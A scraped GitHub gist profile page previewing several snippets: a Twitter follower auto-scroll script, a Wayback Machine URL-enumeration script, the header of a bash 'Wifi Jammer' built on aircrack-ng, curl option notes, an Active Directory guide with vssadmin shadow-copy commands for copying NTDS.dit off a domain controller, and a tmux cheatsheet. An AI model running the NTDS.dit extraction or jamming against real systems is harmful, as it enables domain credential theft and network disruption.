Skip to content

Instantly share code, notes, and snippets.

View L4bF0x's full-sized avatar

F0x L4bF0x

View GitHub Profile
@LoranKloeze
LoranKloeze / scroll_twitter_followers.js
Last active March 6, 2021 09:12
Automatic scroll of Twitter followers, stop scrolling by hand...
/*
You know how Twitter never loads all the followers but you have to keep scrolling? Well,
this script automatically keeps scrolling to the end of the follower list.
30-05-2017
(c) 2017 - Loran Kloeze - [email protected]
Usage
- Go to https://www.twitter.com/twitter_handle/followers (change twitter_handle in i.e. realdonaldtrump)
- Open up the console (F12) (Firefox users: type 'allow pasting' if you haven't done so yet)
- Select the contents of this complete file and copy/paste it to the console and hit enter
import requests
import sys
import json
def waybackurls(host, with_subs):
if with_subs:
url = 'http://web.archive.org/cdx/search/cdx?url=*.%s/*&output=json&fl=original&collapse=urlkey' % host
else:
url = 'http://web.archive.org/cdx/search/cdx?url=%s/*&output=json&fl=original&collapse=urlkey' % host
@gibbyb
gibbyb / wifijam.sh
Last active February 20, 2025 20:54
Wifi Jammer using aircrack-ng and nmap
#!/bin/bash
#A very simple yet effective Wifi Jammer
#There are other jammers out there, but they did not work for me
#Let me know how it works for ya and feel free to give me any tips.
#This is the first script I have written.
clear
echo -n "Wifi Jammer ";echo "By Gibby"
echo "You will need aircrack-ng and nmap for this tool."
echo -n "If it's all good, press enter.";read
@subfuzion
subfuzion / curl.md
Last active March 8, 2025 21:50
curl POST examples

Common Options

-#, --progress-bar Make curl display a simple progress bar instead of the more informational standard meter.

-b, --cookie <name=data> Supply cookie with request. If no =, then specifies the cookie file to use (see -c).

-c, --cookie-jar <file name> File to save response cookies to.

Microsoft stores the Active Directory data in tables in a proprietary ESE database format. The database is contained in the NTDS.dit (%SystemRoot%\ntds\NTDS.dit) file.
This file is encrypted to prevent any data extraction, so we will need to acquire the key to be able to perform the extraction of the target data.
The required Password Encryption Key is stored in the NTDS.dit file, but is encrypted itself with the BOOTKEY.
To obtain this BOOTKEY, we need to acquire a copy of the SYSTEM registry hive (%SystemRoot%\System32\config\System) from the same Domain Controller as we acquired the NTDS.dit file.
Extract NTDS/SYSTEM from a domain controller:
net start vss
vssadmin create shadow /for=c:
vssadmin list shadows
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\ntds\ntds.dit C:\temp

tmux cheatsheet

As configured in my dotfiles.

start new:

tmux

start new with session name: